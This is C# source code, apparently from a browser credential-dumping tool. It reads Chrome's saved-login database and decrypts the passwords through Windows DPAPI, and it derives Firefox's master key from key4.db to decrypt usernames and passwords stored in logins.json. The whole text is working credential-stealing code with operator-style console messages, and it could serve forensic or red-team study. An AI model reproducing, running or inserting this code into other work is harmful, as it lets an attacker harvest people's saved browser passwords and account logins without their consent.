private void ChromeDatabaseDecrypt(SQLiteConnection sqliteConnection) { SQLiteCommand sqliteCommand = sqliteConnection.CreateCommand(); sqliteCommand.CommandText = "SELECT action_url, username_value, password_value FROM logins"; SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader(); //Iterate over each returned row from the query while (sqliteDataReader.Read()) { //Store columns as variables string formSubmitUrl = sqliteDataReader.GetString(0); //Avoid Printing empty rows if (string.IsNullOrEmpty(formSubmitUrl)) { continue; } string username = sqliteDataReader.GetString(1); byte[] password = (byte[])sqliteDataReader[2]; //Cast to byteArray for DPAPI decryption try { //DPAPI Decrypt - Requires System.Security.dll and System.Security.Cryptography byte[] decryptedBytes = ProtectedData.Unprotect(password, null, DataProtectionScope.CurrentUser); string decryptedPasswordString = Encoding.ASCII.GetString(decryptedBytes); BrowserLoginData loginData = new BrowserLoginData(formSubmitUrl, username, decryptedPasswordString, "Chrome"); ChromeLoginDataList.Add(loginData); } catch (Exception e) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine($"[!] Error Decrypting Password: Exception {e}"); Console.ResetColor(); } } sqliteDataReader.Close(); sqliteConnection.Dispose(); }
public FirefoxDatabaseDecryptor(string profile, string password) { ProfileDir = profile; Key4dbpath = ProfileDir + @"\key4.db"; MasterPassword = password; //Check profile for key4 database before attempting decryption if (File.Exists(Key4dbpath)) { Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine($"[+] Found Firefox credential database at: \"{Key4dbpath}\""); Console.ResetColor(); // If Firefox version >= 75.0, asn.1 parser will throw IndexOutOfRange exception when trying to parse encrypted data as asn.1 DER encoded try { Key4DatabaseConnection(Key4dbpath); } catch (IndexOutOfRangeException e) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine($"[-] Could not correctly parse the contents of {Key4dbpath} - possibly incorrect Firefox version."); Console.ResetColor(); } //Store a RootObject from FirefoxLoginsJSON (hopefully) containing multiple FirefoxLoginsJSON.Login instances FirefoxLoginsJSON.Rootobject JSONLogins = GetJSONLogins(ProfileDir); //Decrypt password-check value to ensure correct decryption DecryptedPasswordCheck = Decrypt3DES(GlobalSalt, EntrySaltPasswordCheck, CipherTextPasswordCheck, MasterPassword); if (PasswordCheck(DecryptedPasswordCheck)) { //Decrypt master key (this becomes padded EDE key for username / password decryption) //Master key should have 8 bytes of PKCS#7 Padding Decrypted3DESKey = Decrypt3DES(GlobalSalt, EntrySalt3DESKey, CipherText3DESKey, MasterPassword); //Check for PKCS#7 padding and remove if it exists Decrypted3DESKey = Unpad(Decrypted3DESKey); FirefoxLoginDataList = new List <BrowserLoginData>(); Console.ForegroundColor = ConsoleColor.Yellow; foreach (FirefoxLoginsJSON.Login login in JSONLogins.Logins) { try { if (!(login.FormSubmitURL.Equals(null))) { byte[] usernameBytes = Convert.FromBase64String(login.EncryptedUsername); byte[] passwordBytes = Convert.FromBase64String(login.EncryptedPassword); ASN1 usernameASN1 = new ASN1(usernameBytes); byte[] usernameIV = usernameASN1.RootSequence.Sequences[0].Sequences[0].OctetStrings[0]; byte[] usernameEncrypted = usernameASN1.RootSequence.Sequences[0].Sequences[0].OctetStrings[1]; //Extract password ciphertext from logins.json ASN1 passwordASN1 = new ASN1(passwordBytes); byte[] passwordIV = passwordASN1.RootSequence.Sequences[0].Sequences[0].OctetStrings[0]; byte[] passwordEncrypted = passwordASN1.RootSequence.Sequences[0].Sequences[0].OctetStrings[1]; string decryptedUsername = Encoding.UTF8.GetString(Unpad(Decrypt3DESLogins(usernameEncrypted, usernameIV, Decrypted3DESKey))); string decryptedPassword = Encoding.UTF8.GetString(Unpad(Decrypt3DESLogins(passwordEncrypted, passwordIV, Decrypted3DESKey))); BrowserLoginData loginData = new BrowserLoginData(login.FormSubmitURL, decryptedUsername, decryptedPassword, "Firefox"); FirefoxLoginDataList.Add(loginData); } } catch (NullReferenceException) { } } Console.ResetColor(); } } else { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine($"[-] No credential database found for Firefox profile: {ProfileDir}"); Console.ResetColor(); } }